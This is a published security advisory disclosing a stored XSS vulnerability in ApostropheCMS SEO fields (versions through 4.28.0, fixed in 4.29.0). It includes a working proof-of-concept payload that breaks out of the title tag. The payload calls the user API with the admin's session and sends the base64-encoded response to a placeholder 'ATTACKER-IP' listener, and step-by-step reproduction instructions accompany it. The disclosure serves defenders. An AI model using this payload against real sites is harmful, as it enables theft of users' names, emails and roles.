GHSA-855c-r2vq-c292

Suggest an improvement
Source
https://github.com/advisories/GHSA-855c-r2vq-c292
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-855c-r2vq-c292/GHSA-855c-r2vq-c292.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-855c-r2vq-c292
Aliases
Published
2026-04-16T20:44:18Z
Modified
2026-05-05T16:04:04Z
Severity
  • 8.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N CVSS Calculator
Summary
Stored XSS in SEO Fields Leads to Authenticated API Data Exposure in ApostropheCMS
Details

Summary

A stored cross-site scripting (XSS) vulnerability exists in SEO-related fields (SEO Title and Meta Description) in ApostropheCMS.

Improper neutralization of user-controlled input in SEO-related fields allows injection of arbitrary JavaScript into HTML contexts, resulting in stored cross-site scripting (XSS). This can be leveraged to perform authenticated API requests and exfiltrate sensitive data, resulting in a compromise of application confidentiality.

Affected Version

ApostropheCMS (tested on version: v4.28.0)

Vulnerability Details

User-controlled input in SEO fields is improperly handled and rendered into HTML contexts such as:

  • <title>
  • <meta> attributes
  • structured data (JSON-LD)

This allows attackers to inject and execute arbitrary JavaScript in the context of authenticated users.

PoC 1

The following payload demonstrates breaking out of HTML context:

"></title><script>alert(1)</script>

This confirms:

  • Improper output encoding
  • Ability to escape <title> / <meta> contexts
  • Arbitrary script execution

PoC 2

This PoC demonstrates how the stored XSS can be leveraged to perform authenticated API requests and exfiltrate sensitive data.

"></title><script>
fetch('/api/v1/@apostrophecms/user', {
  credentials:'include'
})
.then(r=>r.text())
.then(d=>{
  fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
</script>

Video Proof of Concept

Watch the following YouTube video for a full demonstration of the exploit:

PoC Video: https://youtu.be/FZuulua_pa8

Steps to Reproduce

  1. Start a local listener: python3 -m http.server 5656
  2. Login to ApostropheCMS as an authenticated user
  3. Create or edit a page
  4. Navigate to SEO settings
  5. Insert the payload into the SEO Title field and Meta Description
"></title><script>
fetch('/api/v1/@apostrophecms/user',{
  credentials:'include'
})
.then(r=>r.text())
.then(d=>{
  fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
</script>
  1. Set Schema Type to "Web page"
  2. Save and publish the page
  3. Have an administrator visit the page

Result

  • The payload executes in the admin’s browser

  • The script sends a request to: /api/v1/@apostrophecms/user

  • The response contains sensitive user data:

    • usernames
    • email addresses
    • roles (including admin)
  • The data is exfiltrated to the attacker-controlled server:

    • http://ATTACKER-IP:5656

Evidence

  • The attacker server receives:
    • GET /?data=BASE64_ENCODED_RESPONSE
  • Decoding the response reveals sensitive application data.

Security Impact

This vulnerability allows an attacker to:

  • Execute arbitrary JavaScript in an authenticated admin context
  • Perform authenticated API requests (session riding)
  • Access sensitive application data via internal APIs
  • Exfiltrate sensitive data to an external attacker-controlled server

References

Database specific
{
    "cwe_ids": [
        "CWE-116",
        "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T20:44:18Z",
    "nvd_published_at": "2026-04-15T20:16:36Z",
    "severity": "HIGH"
}
References

Affected packages

npm / apostrophe

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
4.29.0

Database specific

last_known_affected_version_range
"<= 4.28.0"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-855c-r2vq-c292/GHSA-855c-r2vq-c292.json"